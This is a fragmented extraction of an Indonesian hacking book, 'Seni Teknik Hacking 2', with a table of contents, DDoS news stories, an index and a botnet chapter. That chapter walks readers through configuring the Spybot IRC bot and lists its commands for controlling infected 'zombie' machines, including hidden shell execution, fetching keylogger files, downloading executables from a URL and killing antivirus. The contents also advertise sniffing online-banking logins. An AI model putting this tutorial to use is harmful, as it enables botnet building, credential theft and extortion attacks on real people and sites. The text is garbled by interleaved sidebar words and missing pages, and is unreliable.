Jasakom S’to
http://www.Jasakom.com/Penerbitan
SENI TEKNIK HACKING 2 : UNCENSORED
Publisher Contact
Jasakom PO Box 6179 JKB
Fax : 021-56957634
Web Site HP : 0888-1911091
http://www.jasakom.com/penerbitan
Cover Design & Idea & Layout
Email S’to
admin@jasakom.com
1. Barang siapa dengan sengaja dan tanpa hak melakukan kegiatan sebagaimana dimaksud dalam pasal 2 ayat
(1) atau pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara paling singkat 1 (satu) bulan dan/atau
denda paling sedikit Rp. 1.000.000 (satu juta rupiah) atau pidana penjara paling lama 7 (tujuh) tahun dan/
atau denda paling banyak Rp. 5.000.000.000.00 (lima miliar rupiah).
2. Barang siapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu
Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1), dipi-
dana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp. 500.000.000,00
(lima ratus juta rupiah)
IV
Kata Pengantar
Tidak terasa, sudah 2 tahun semenjak terbitnya buku STH-1 yang telah
dicetak ulang sebanyak 6x. Harapan yang besar oleh pembaca buku
di seri STH-1 membuat saya menyusun dengan lebih berhati-hati agar
seri ke-2 ini tidak mengecewakan dengan memperhatikan permintaan
dari pembaca, walaupun tidak semua permintaan bisa saya penuhi
semuanya.
Dan tentu saja, kini STH-2 juga menyertakan Video Tutorial yang tidak
terdapat pada buku STH-1, sesuai dengan permintaan semua pem-
baca (benar, semuaaaanya). Video tutorial kini menggunakan interface
baru versi pertama yang saya harapkan bisa mempermudah pembaca
dalam mengakses video tutorial yang ada.
Harapan saya, kerja keras selama ini dalam menyusun buku ini bisa
memuaskan harapan Anda. Apakah akan ada seri STH-3 ? tidak ada
yang bisa mengetahuinya, termasuk saya. Tentu saja, bila ada per-
mintaan yang tinggi dan topik yang menarik, saya akan mencoba lagi
membuat seri lanjutan ini, yaitu STH-3.
S ’to
email : sto@jasakom.com
http://www.jasakom.com/sto
Jasakom e-Learning Versi 1.00
Daftar Isi
BAGIAN 1 Sniffing, ARP Poisoning & Man-In-the-Middle 1
Sniffer 3
Ethernet 4
CSMA/CD 6
Enkapsulasi dan Dekapsulasi 7
Hub 8
Sniffing, Action !! 10
Hack 2x01 12
Passive Sniffing Hub – Ngintip Semua Data
Hack 2x02 16
Passive Sniffing pada Hub – Ngintip Password ICQ,
POP3, TELNET, SMTP, dll
Hack 2x03 19
Passive Sniffing pada Hub – Ngintip Password Web
Site
Switch 22
Jenis Switch 23
RAM Switch 25
Hack 2x04 30
Active Sniffing pada Switch – MAC Address flooding
Hack 2.05 34
Active Sniffing pada Switch – Man-in-the-middle Attack
(MITM)
Hack 2.06 39
Active Sniffing pada Switch – Hacking Klikbca, Ci-
tibank, dkk
Hack 2.07 56
Mencegah Sniffing dengan Enkripsi
Hack 2.08 58
Mencegah Perubahan ARP Cache
VII
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 2 DNS & DHCP Hacking 61
DNS Server & Nama Domain 63
Hack 2.09 66
DNS HACKING
Hack 2.10 70
DNS Host File Hacking
Hack 2x11 74
DHCP Spoofing
VIII
Jasakom
2 2 2 2 2 2 2 2 2 2 2
Hack 2x16 118
Menggunakan Software Keylogger – Fearless Keylog-
ger
Hack 2x17 123
Penggabungan files, menipu dengan file games
Hack 2x18 128
Mengatasi Keylogger
IX
Jasakom
Blank
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Kamis , 29/07/2004 11:42 WIB
BOTNET
Hacker Rusia Kerjai
Situs Taruhan
N
Titis Widyatmoko - detikInet
DDoS
Jakarta, Hacker asal Rusia diintip
terus oleh satuan polisi gabungan
Rusia dan Inggris. Aksi para hacker itu
N
dituding menjadi penyebab kerugian
puluhan juta dolar yang dialami situs-
VULNERABILITIES SCANNER
situs taruhan di Inggris.
Cara yang dilakukan oleh hacker
asal Rusia ini adalah pemerasan
ke situs-situs taruhan. Hacker akan melakukan serangan Denial of Service
(DOS) membanjiri traffic situs sehingga sulit diakses. Kemudian mereka
akan meminta uang sebagai syarat untuk menghentikan serangan. “Tujuannya
adalah membuat timpang kerja perusahaan,” kata Yevgeny Yakimovich, kepala
anti cybercrime di Departemen Dalam Negeri Rusia.
Rusia, dengan tenaga kerja berpendidikan yang jumlahnya besar namun jumlah
N
polisi yang tidak cukup membuatnya terkenal sebagai surga pembajakan dan
kriminal komputer.
“Orang sudah dibuat takut oleh mafia Rusia, sekarang mereka dibikin takut
oleh hacker Rusia,” tandas Letjen Polisi Boris Miroshnikov yang disampaikan
kepada Presiden Rusia Vladimir Putin dikutip kantor berita Itar-Tass, Kamis
(29/7/2004).
Para hacker asal Rusia ini memeras setidaknya sembilan situs taruhan Inggris.
Serangan dilakukan tiga sampai lima kali dengan meminta bayaran sampai
dengan US$ 50 ribu. Dua bandar judi online yang menderita kerugian banyak
sempat setuju membayar masing-masing sebesar US$ 40 ribu.
Bandar judi online kerapkali menjadi sasaran para hacker pemeras ini pada
saat-saat penting dimana transaksi situs ini sedang tinggi. Biasanya hal itu
terjadi ketika ada even-even olahraga penting.
Tim gabungan cyber detektif Inggris dan Rusia telah berusaha mencari
tersangka di beberapa kota di Rusia. Polisi berhasil menangkan dua tersangka
dan menyita komputer serta software di Moskow, St Petersburg dan wilayah
Saratov. (tis/)
149
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N
serangan DDoS
BOTNET
BAGIAN 4
N
Tapi ini juga merupakan peringatan kepada web site-web site lainnya, bahwa
BOTNET
seorang hacker tidak perlu mempunyai kemampuan teknis yang sangat tinggi
untuk melakukan perusakan.
“Dia mempunyai kemampuan yang baik dibidang komputer, tapi masih
tidak pantas dikatakan sebagai jenius”, kata Jean-Pierre dari Royal Canadian
N
Mounted Police (RCMP) pada suatu konferensi pers.
DDoS
RCMP mengatakan bahwa hukumannya bisa termasuk 10 tahun penjara. Juru
bicara RCMP mengatakan bahwa FBI telah menghubungi mereka pada awal
N
febuari ketika serangan dilakukan.
VULNERABILITIES SCANNER
Sambil menunggu tuntutan dalam persidangan, anak ini dilarang menggunakan
komputer selain disekolah dan diperintahkan untuk tidak menggunakan
internet. Jam malam juga diberlakukan oleh pengadilan terhadap anak ini.
Polisi mengatakan bahwa investigasi terus berlangsung dan tambahan tuntutan
mungkin saja terjadi terhadap Mafiaboy atau orang-orang lainnya yang ikut
terlibat.
Berbeda dengan kejahatan umumnya, penjahat cyber tidak mengenal batas
negara dan kedaulatan. Mafiaboy dituntut terutama karena serangan empat jam
terhadap CNN.com pada tanggal 8 februari. Polisi mengatakan bawah anak ini
menyombongkan serangannya di dalam chatroom dan area lainnya.
N
“Hacker suka menyombongkan kemampuan dirinya, mereka suka pamer
untuk memperlihatkan bahwa mereka jago dan mereka adalah yang terbaik”
kata RCMP, “Menurut analisa kami, Mafiaboy sebenarnya tidaklah sehebat
itu”.
Serangan dilakukan dengan menggunakan satu komputer yang memerintahkan
komputer-komputer “budak” di seluruh dunia. Komputer “budak” bisa
digunakan tanpa sepengetahuan pemiliknya. Hacker membuat komputer-
komputer ini mengirimkan banyak sekali data-data ke situs internet dalam
waktu yang singkat, yang akan menyebabkan web site korban menjadi berhenti
bekerja. Ini sama saja dengan membuat jutaan orang menelpon ke nomor
telepon yang sama.
Komputer di University of California di Santa Barbara (UCSB) digunakan
untuk menyerang CNN. Kantor berita ABC News telah melaporkan bahwa
penyidik menggunakan catatan log di komputer UCSB untuk melacak serangan
yang dilakukan oleh Mafiaboy.
151
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
Mafiaboy diduga juga meminta pendapat dari hacker lain tentang situs yang
N
com dan ZDNet. Kejadian ini mengejutkan kita karena menunjukkan betapa
mudahnya seseorang bisa menyebabkan kerusakan yang sedemikian besarnya
tanpa perlu mempunyai kemampuan yang tinggi.
* Berita diambil dari : http://news.zdnet.com/2100-9595_22-520033.html
152
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Kejadian ini selalu berulang dan tidak ada yang bisa dilakukan oleh
BOTNET
detik.com karena dianggap sebagai kejadian yang normal.
Lonjakan pengguna pada waktu yang bersama-sama telah
menghabiskan bandwidth detik.com. Bandwidth detik.com,
tidaklah sebanding dengan kumpulan bandwidth kecil dari seluruh
N
penggunanya.
DDoS
Ini memang bukan serangan dari hacker namun tindakan dan akibatnya
sama persis seperti yang dilakukan oleh hacker dengan teknis DDoS.
N
Andaikan seorang hacker mempunyai pasukan sebanyak pengguna
VULNERABILITIES SCANNER
detik.com yang melihat berita, maka sang hacker bisa membuat
detik.com down/mati setiap detik, kapanpun diinginkan. Jika
serangan dilakukan terus menerus, maka bisnis detik.com bisa hancur
berantakan. Siapa yang mau memasang iklan disitus yang tidak aktif?
Atas dasar seperti inilah, sempat terjadi beberapa kasus pemerasan
yang dilakukan oleh para hacker yang mampu melancarkan serangan
DDoS ini terhadap situs-situs yang menggantungkan hidupnya dari
dunia maya.
153
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N
154
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Lalu bagaimana hacker mencari atau mendapatkan komputer zombie ?
BOTNET
tentu saja jangan berharap hacker akan memintanya baik-baik, karena
hal itu tidak ada dalam kamus hacker. Mereka akan mengambil alih
komputer Anda untuk dijadikan zombie dengan berbagai cara.
Hacker semacam ini tidak melakukan aktifitas hacking dengan
N
melakukan aksi deface. Bagi mereka aksi deface adalah sebuah
DDoS
bencana, karena server tersebut akan segera diperbaiki yang artinya
mereka tidak punya akses lagi. Untuk itu, server yang berhasil diambil
alih, akan diamankan agar tidak mendapatkan serangan dari pihak
N
lain dan yang terpenting, tidak diketahui oleh sang pemilik bahwa
VULNERABILITIES SCANNER
komputernya telah diambil alih dan sudah menjadi komputer zombie.
Aksi hacking memang bisa mengambil alih sebuah komputer dan
menjadikannya sebagai zombie, namun cara ini terlalu lambat. Metode
menjadikan komputer sebagai zombie yang paling cepat adalah dengan
bantuan worm. Hacker hanya perlu menamkan fungsi zombie sehingga,
pencarian korban akan dilakukan secara otomatis tanpa perlu kerja
keras dan manual dari sang hacker.
Hacker cina membuat worm CodeRed yang melakukan penyerangan ke
situs gedung putih www.whitehouse.gov dan menyebabkan situs ini harus
dipindahkan. Berapa komputer yang didapatkan oleh worm CodeRed
N
ini ? 359.000 dalam waktu 14 jam dan total komputer di seluruh dunia
yang berhasil didapatkan, diperkirakan mencapai jutaan !
Bila Anda tertarik dengan masalah Worm, Anda bisa membaca buku
yang ditulis oleh Achmad Darmal. Buku yang diberi judul “Computer
Worm 1” dan “Computer Worm 2” yang diterbitkan oleh Jasakom, adalah
buku yang sangat menarik untuk mengetahui lebih jauh tentang
apa dan bagaimana membuat worm yang sering dianggap sebagai
pengetahuan tabu.
155
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
Google, yahoo serta ribuan situs lainnya mempunyai layanan pay per
click yang sangat menarik. Anda memasang iklan yang disediakan
BOTNET
156
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
3. Pencurian bandwidh dan space
BOTNET
Hacker bisa memanfaatkan komputer yang dikuasainya untuk
menyimpan film porno, software bajakan dan material illegal
lainnya sambil melakukan penjualan barang-barang tersebut.
N
Cara ini relatif aman dan murah karena hacker tidak perlu
menyediakan bandwidth yang mahal dan material illegal juga
DDoS
tidak berada di komputernya sehingga menyulitkan aparat yang
berwenang dalam menangkap mereka.
N
VULNERABILITIES SCANNER
Membicara apa yang bisa dilakukan oleh hacker dengan “pasukannya”,
merupakan topik yang tidak ada habisnya. Dengan adanya pasukan
komputer yang banyak, hacker bisa melakukan apa saja yang
dikehendaki.
BOTNET
N
Anda mungkin sudah banyak sekali mendengar cerita dari koran,
cerita dari majalah serta kabar burung dan kabar tetangga mengenai
serangan DDoS. Serangan ini memang sangat heboh sehingga banyak
sekali yang mampu menceritakan hal ini dengan sangat meyakinkan,
tapi sedikit yang benar-benar mengetahui bagaimana melakukannya
serta teknik apa yang digunakan.
Perintah ping yang paling sering didemokan sebenarnya sudah bisa
dikatakan tidak pernah digunakan lagi karena hampir semua firewall
telah melakukan bloking terhadap protokol ICMP !
Melakukan serangan DDoS, seperti yang telah saya katakan,
membutuhkan tentara zombie. Untuk membentuk tentara zombie ini,
digunakan program-program seperti Tribal Flood Network (TFN),
Trinoo, TFN2K, WinTrinoo, Trinity dan lain sebagainya. Sekarang
bersiaplah kecewa karena saya tidak membahas semua software ini
untuk melakukan serangan DDoS (salahkan saya sekarang).
157
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
Tentu saja, buku ini tidak hanya memberikan Anda cerita yang hanya
N
cerita. Teknik serangan DDoS yang akan dibahas disini adalah jenis
serangan yang sangat dikenal di dunia hacker, dunia para pemimpin
VULNERABILITIES SCANNER
158
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Hacker, mengendalikan bot-bot ini dengan cara masuk ke channel
BOTNET
ini dan tinggal memerintahkan bot ini untuk melakukan apapun
yang dikehendaki. Dengan satu perintah, semua bot akan melakukan
serangan ke komputer korban yang membuatnya tidak berkutik dan
tumbang tanpa darah yang mengalir (hanya air mata).
N
Software bot yang sering digunakan antara lain adalah spybot, sdbot,
DDoS
agobot, GTBot, phatbot dan berbagai variasi bot lainnya. Bot yang
telah saya sebutkan ini semuanya tersedia dalam bentuk source code
sehingga variantnya bisa dikatakan tidak terhitung jumlahnya.
N
Bot-bot ini sendiri bukanlah program yang mudah untuk didapatkan
VULNERABILITIES SCANNER
karena pencarian dengan search engine seperti google dan yahoo tidak
memberikan hasil yang memuaskan kecuali pembahasan tentang bot-
bot ini. Pada buku ini, saya akan menggunakan spybot sebagai contoh
pembahasan.
Dengan sedikit kemampuan programming, Anda bisa merubah bot ini
sesuai dengan keinginan dan unik dari yang lain-lainnya. Akibatnya ?
zombie ini semakin hari semakin berkembang dan berkembang seiring
dengan kemampuan para coder hebat yang masih berusia muda
(mereka bahkan mempunyai waktu yang tidak terbatas).
N
SPYBOT
Spybot merupakan salah satu bot yang
terkenal di dunia underground dan sangat
luas digunakan oleh para hacker. Bot ini dibuat
dengan bahasa C oleh Mich yang sebelumnya disebarkan secara
terbatas melalui situsnya http://members.lycos.co.uk/ircspybot (saat ini
sudah tidak aktif lagi)
Karena program ini berupa source code, Anda harus melakukan proses
kompilasi yang sering menakutkan pengguna awam. Namun, Anda
tidak perlu khawatir, pembuat program ini telah menyediakan sebuah
batch file yang tinggal Anda klik dan selesailah sudah.
159
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
ini, sangatlah mudah dan tidak ada yang perlu di ceritakan lebih lanjut.
Anda hanya perlu klik next, next, finish dan selesai.
File sumber spybot terdiri atas file spybot.c yang merupakan source
code file sedangkan konfigurasi disimpan pada file yang berbeda yaitu
settings.h. Anda menentukan sifat dan karakteristik file spybot yang
hendak di ciptakan melalui file settings ini.
Sebagai contohnya, saya ambil beberapa baris penting pada file
settings.h.
N
Secara default channel tersebut diset dengan #testing dan disini akan
saya ganti menjadi #WarungZombie. Setelah perubahan, kedua baris
tersebut akan berubah menjadi :
160
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Karena itu, kita juga perlu menentukan server mana channel
BOTNET
#WarungZombie akan dibuat. Baris yang menentukan hal ini berada
pada baris berikut :
//servers
N
char *ircservers[]={
DDoS
“127.0.0.1”,
“irc.icq.com”,
NULL //dont remove this line
};
N
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
VULNERABILITIES SCANNER
6667,
6666,
};
N
Gambar 86. Melihat konfigurasi
server-server IRC
Pada contoh ini, saya tidak akan merubah server yang digunakan
N
char *ircservers[]={
“irc.icq.com”,
NULL //dont remove this line
};
//number of ports MUST be the same as the number of servers you use,
int serverports[]={
7000,
};
N
Catatan
Baris komentar dimulai dengan karakter //. Jadi jika Anda hendak
DDoS
keterangan “//number of ports MUST be the same as the number of servers you use” di
atas
BOTNET
162
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Selain menggunakan irc server publik, hacker juga bisa membuat
BOTNET
server irc sendiri namun cara ini jarang dilakukan karena memudahkan
penangkapan hacker tersebut. Pada kejadian sesungguhnya, komputer-
komputer zombie adalah komputer yang berbeda dan mempunyai
alamat IP nya masing-masing sehingga tidak begitu bermasalah dengan
N
aturan semacam ini.
DDoS
Pada contoh, saya menggunakan mIRC untuk melakukan koneksi
ke channel #WarungZombie dengan server irc.icq.com dan nick
HackerDDOS.
N
Pada cerita ini, diasumsikan 2 komputer telah terinfeksi dengan bot,
VULNERABILITIES SCANNER
dimana bot ini secara otomatis akan join ke channel #WarungZombie. Satu
zombie menggunakan nick Zombie152 dan satunya lagi menggunakan
nick Zombir187.
Nama nick bot diambil dari user yang login ditambah dengan angka
secara acak. Pada contoh, dua komputer yang terinfeksi masing-masing
login dengan nama Zombie1 dan script secara otomatis menambahkan
angka 52 dan 87.
163
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
Pada contoh, terlihat saat saya mengetikkan perintah “info” kepada bot
N
BAGIAN 4
N
Sebuah web server berjalan dengan membuka port 80 dan setiap
BOTNET
kali Anda melakukan browsing ke web server, maka artinya Anda
membuka sebuah koneksi ke port 80.
Seberapapun besarnya sebuah server, tentulah mempunyai batas dan
batas inilah yang akan dimainkan oleh serangan DDoS. Serangan DDoS
N
akan membuat koneksi ke port 80 sebanyak-banyaknya sampai server
DDoS
tersebut terlalu penuh untuk merima koneksi yang lain, akibatnya
adalah situs yang diserang, menjadi tidak bisa diakses oleh pengguna
yang sebenarnya.
N
Synflood adalah serangan dengan memanfaatkan sifat koneksi TCP/IP.
VULNERABILITIES SCANNER
Masih ingat dengan three way handshake ? Untuk memulai sebuah
komunikasi, protokol TCP/IP memulianya dengan jabat tangan 3 kali.
Pertama kali komputer sumber mengirimkan paket SYN, dibalas oleh
target dengan paket SYN/ACK. Terakhir, sumber mengirimkan ACK.
Synflood akan mengirimkan paket SYN kepada target yang dalam contoh
ini adalah web server, seakan-akan ia hendak melakukan koneksi
yang sah, namun sebenarnya paket SYN tersebut telah dimanipulasi
sehingga alamat sumber menjadi berubah.
Web Server kemudian mengirimkan paket balasan SYN/ACK dan
mengalokasikan memory untuk digunakan oleh koneksi ini. Namun
N
karena hacker telah merubah alamat IP sumber, balasan ini lari entah
ke mana sehingga tidak pernah ada balasan.
Web server menunggu, menunggu dan terus menunggu tanpa pernah
mendapatkan paket ACK. Sementara paket SYN yang lainnya terus
terjadi dan Web server terus mengalokasikan memorynya yang
akhirnya membuat memorynya menjadi penuh.
Pada sebagian web server, hal ini bisa saja membuatnya crash,
namun, itu dulu. Sekarang hal tersebut sebagian besarnya sudah bisa
diantisipasi namun menghabiskan resource ? tetap saja terjadi ! karena
itulah sifat dasar dari koneksi TCP/IP.
Beberapa konfigurasi, mencegahnya dengan membuat time out untuk
sebuah koneksi apabila tidak ada jawaban ACK dari sumber, namun
cara ini juga membuat user sah yang mempunyai koneksi yang lambat
tidak bisa mengakses resource yang seharusnya karena mengalami
time out terus menerus.
165
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
Masih ingat dengan cerita saya tentang situs detik.com yang selalu
N
166
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
Fungsi-fungsi yang telah saya bahas ini, hanyalah sebagian kecil dari
BOTNET
fungsi-fungsi yang ada. Berikut adalah fungsi menarik lainnya yang
tersedia :
*ingat bahwa Anda bisa mengganti perintah default ini dengan kata-
kata lain sesuai dengan kehendak Anda melalui file settings.h
N
DDoS
Perintah Contoh dan keterangan
N
Login password Untuk memerintah bot yang diberi
password, Anda harus login terlebih
VULNERABILITIES SCANNER
dahulu dengan perintah ini.
raw [raw command] Mengirimkan perintah-perintah ke
IRC. Anda bisa mempelajari perintah
IRC untuk mengetahuinya lebih lanjut.
(contoh: raw PRIVMSG #spybot1.1 :
hello)
list [path+filter] Melihat file, sama dengan perintah dir.
(contoh: list c:\*.*)
delete [filename] Menghapus file.
N
(contoh: delete c:\windows\netstat.exe)
execute [filename] Menjalankan file atau program.
Sebagai contoh, dengan memberikan
perintah “Execute c:\windows\
system32\notepad.exe”, program
notepad akan dijalanlan di komputer
zombie.
rename [origenamfile] Merubah nama file. (contoh: rename
[newfile] c:\windows\netstat.exe c:\windows\
netstatbackup.bak)
makedir [dirname] Membuat direktory
(contoh: makedir c:\test\ )
167
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N
168
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 4
N
BOTNET
passwords Menampilkan password dialup,
yang hanya berlaku untuk jika sistem
operasi komputer zombie adalah
windows 95 atau 98
N
listprocesses Melihat proses yang sedang berjalan
di komputer zombie. Berikut adalah
DDoS
contoh keluarannya :
listprocesses
N
[System Process]
System
VULNERABILITIES SCANNER
smss.exe
winlogon.exe
services.exe
lsass.exe
...... ..... .(dipotong)
N
(contoh: killprocess taskmgr.exe)
reconnect Meminta komputer zombie untuk
disconnect dari irc dan melakukan
koneksi kembali
disconnect [sec.] Meminta agar bot zombie melakukan
disconnect dalam jangka waktu
tertentu. Jika tidak diberikan informasi
berapa lama harus disconnect, maka
secara default adalah 30 menit.
quit Mematikan bot
reboot Mereboot komputer zombie
cd-rom [0/1] Membuka atau menutup cdrom
(catatan: cd-rom 1 = buka cd-rom 0 =
tutup)
169
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 3
N
0: F/AV Killer
1: HTTP server listining on poort: 90
root dir: c:\
2: Keylogger logging to #jasakom
killthread [number] Mematikan proses. Sebagai contoh,
untuk mematikan proses keylogger
saya bisa menjalankan perintah :
“killthread 2”
Angka 2 didapatkan dari perintah
threads sebelumnya.
get [filename] Mengambil file yang ada dikomputer
zombie
(contoh: get c:\windows\system\
keylogs.txt)
opencmd Menjalankan command pada
komputer zombie, dalam modus
tersembunyi.
170
Jasakom
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 3
N
cmd [command]
KEYLOGGER
Mengirimkan perintah. Misalnya
untuk mengirimkan perintah ke cmd :
cmd netstat –an
scan [start ip address] [port] Melakukan scanning. Contoh:
[delay] [filename]
“scan 127.0.0.1 17300 1 portscan.txt”
N
download [url] [filename] Mendownload file dari internet.
SESSION HIJACKING
Contoh: download http://127.0.0.1/
server.exe c:\server.exe
uninstall Uninstall program bot dari komputer
korban. Perintah ini akan membuat
program bot tidak lagi aktif di
komputer korban namun file bot nya
sendiri tidak dihapus.
171
Jasakom
2
Blank
2 2 2 2 2 2 2 2 2 2 2
Index
cache dns 71
A
Cain & Abel 16, 17, 18, 19, 33, 39,
ACK Storms VIII, 93 42, 43, 44, 45, 46, 48, 49, 52,
53, 55, 67
active hub 8, 9
CAM 25
active sniffing 3
Citibank VII, 39, 41, 129
agobot 159
coax 4, 5
ARP 1, 11, 26, 27, 28, 29, 34, 36,
37, 39, 42, 43, 44, VII, 43, Collision 6
44, 45, 46, 47, 48, 49, 50, 58, Content Addressable Memory 25
59, 60, 67
CSMA/CD VII, 6, 7
Asynchronously 128
D
B
DDoS IX, 133, 150, 152, 153, 154,
Back Orifice 108 156, 157, 158, 164, 165
Bandwidh 5 Dekapsulasi VII, 7, 8
BCA 39, 41, 51, 53, 67 detik 16, 47, 57, 63, 64, 67, 68, 73,
binder 124, 126, 127 79, 139, 144, 145, 150, 152,
153, 154, 166
BNC 4
DHCP 61, 74, 75, 76, VIII, 76, 75, 76,
bookmark 51, 67 77, 78, 79, 80
BOTNET 133, 157, 158 DHCPACK 75
broadcast 5, 9, 25, 26, 29, 31, 43, DHCPDISCOVER 75
75
DHCPOFFER 75, 77
bus 4
DHCPREQUEST 75
C DHCP Spoofing VIII, 74
Cache ARP 43 DNS VIII, 61, 63, 66, 67, 68, 69, 70,
71, 73, 76
173
Jasakom
2 2 2 2 2 2 2 2 2 2 2
DNS Client Resolver Cache 70, 71 google hacking 138
DNS Spoofer 67, 68 GTBot 159
Domain Name System 63 H
dynamic 45, 46, 49, 50, 59, 60
hacker 3, 14, 15, 16, 25, 31, 33, 34,
E 36, 38, 56, 58, 59, 68, 73, 74,
76, 77, 80, 83, 90, 91, 92, 93,
Engarde Systems 95 94, 95, 96, 102, 103, 104,
105, 106, 108, 112, 115, 116,
Enkapsulasi VII, 7
123, 125, 135, 136, 139, 140,
error recovery 85 141, 142, 149, 151, 152, 153,
Ethereal 11, 12, 33, 78 154, 155, 156, 157, 158, 159,
163, 165, 166
Etherflood 32, 33
HACKING IV, VIII, 61, 66
Ethernet VII, 4, 5, 10, 33
hardware keylogger 40, 108, 109,
Exebinder 124 110, 111, 129, 130
F hosts 70, 71, 72, 73
HTTP 16, 21, 65, 66, 105, 170
FBI 107, 151
HTTPS 16, 53, 54, 55, 56, 105
Fearless Keylogger VIII, 118, 119,
121, 122, 123 hub 4, 5, 6, 7, 8, 9, 10, 22, 24, 25,
31, 56, 106
firewall 31, 39, 40, 45, 90, 157
Hunt 94, 95
FKS.exe 119, 120
flooding VII, 30
I
flushdns 73 ICMP 13, 157
G ICQ VII, 16, 18, 19
IDS 3, 11
gateway 42, 44, 45, 46, 47, 48, 49,
50, 76 Initial Sequence Number 87
GFILANguard VIII, 142, 143, 144 internet 16, 39, 40, 42, 45, 51, 56,
74, 106, 107, 109, 135, 144,
GFI LanGuard Scanner 141 145, 151, 152, 161, 162, 171
174
Jasakom
2 2 2 2 2 2 2 2 2 2 2
ipconfig 71, 72, 73 M
IPSec 56, 105
MAC VII, 24, 25, 26, 27, 28, 29, 30,
IRC 73, 158, 160, 161, 163, 166, 31, 32, 34, 35, 36, 37, 42, 43,
167 44, 45, 46, 48, 49, 50, 58, 59
ISN 87, 88 Mafiaboy IX, 150, 151, 152
ISP 40, 57, 63, 70 Man-in-the-middle Attack VII, 34
ISS Internet 141 Manageable 24
J MITM VII, 34, 67
175
Jasakom
2 2 2 2 2 2 2 2 2 2 2
reliability 85 statik 58
Retina VIII, 141, 146, 147, 148 Stealth Keylogger 107, 108
RJ-11 5 Sub Seven 108
RJ-45 5, 106 switch 4, 5, 6, 8, 9, 11, 22, 23, 24, 25,
27, 28, 29, 30, 31, 32, 33, 34,
routing 38, 47, 48
35, 41, 56, 58, 96, 99, 105, 106
RUNDLL 73
synchronize sequence numbers 87
RUNDLL32 73
Synchronously 128
S Synflood 165
sdbot 159 T
sequence number 85, 86, 88, 89,
T-Sight VIII, 94, 95, 97, 100, 101,
91, 92, 93, 94, 104
102, 103, 104
SESSION HIJACKING 81
Task Manager 114, 120
SMB 56, 105
TCP VIII, 13, 14, 15, 39, 71, 76, 84,
SMTP VII, 16, 56, 57 85, 86, 87, 88, 90, 91, 92, 93,
94, 105, 143, 144, 145, 165
Sniffer 3, 17, 19, 48
tcpdump 11, 22
sniffing 3, 4, 5, 6, 8, 10, 11, 12, 13,
14, 16, 17, 19, 22, 23, 29, TELNET VII, 16
34, 41, 42, 48, 55, 56
TFN 157
Snort 11
TFN2K 157
Spoofer 67, 68
Thinnet 4
Spoofing VIII, 67, 74
Three Way Handshake VIII, 86
SPYBOT IX, 159
Track Down 83
ssh 105
Tribal Flood Network 157
star 5
Trinity 157
static 59, 60
Trinoo 157
176
Jasakom
2 2 2 2 2 2 2 2 2 2 2
trojan 40, 107, 108, 119, 123, 125 Z
Tsutomo Shimamura 83, 84
zombie 154, 155, 156, 157, 158,
TTY-Wacher 94, 95 159, 163, 166, 167, 168,
169, 170
U
windowing 89
Windows 2003 49, 70, 71, 78, 79, 80,
89, 91, 92, 93, 94, 98, 122
windows 98 73
Windows XP 32, 71, 97, 168
Windump 11
WinTrinoo 157
WireShark 11, 12, 22
177
Jasakom
Blank
HTTP://WWW.JASAKOM.COM/PENERBITAN
. Computer Worm 1 & Worm 2
Secret of Underground Coding
Penulis : Achmad Darmal
Tentu Anda sudah sering mendengar worm
lokal seperti worm Pesin, worm Kangen dan
worm RontokBro. Anda juga tentu mengetahui
bahwa worm-worm tersebut dibuat oleh orang
Indonesia tapi tahukah Anda bagaimana cara
membuatnya ? Teknik apa saja yang digu-
nakan ? Apa saja yang mampu dilakukan oleh
sebuah worm ? Bagaimana cara kerjanya ?
Buku ini tidak hanya menjelaskan kepada para pembaca apa
itu sesungguhnya worm komputer namun juga bagaimana
membuat sebuah worm secara bertahap serta berbagai teknik rahasia dibelakangnya.
Melalui Worm WSar.1 hingga WSar.9, buku ini akan mengungkap teknik dasar dan be-
berapa teknik yang selama ini dirahasiakan para worm writer ataupun virus writer, terma-
suk teknik polymorphic, droping file, watcher, shell spawning,
enkripsi, kompresi hingga teknik comparison yang akan di-
aplikasikan untuk melumpuhkan suatu antivirus.
* Anda akan melihat pembuatan suatu aplikasi dengan bahasa ASP dan
PHP dan bagaimana aplikasi tersebut bisa di ambil alih oleh Hacker !
BEST SELLER !!
Web : http://www.jasakom.com/penerbitan
email : admin@jasakom.com
Fax : 021-56957634
HP : 0888-1911091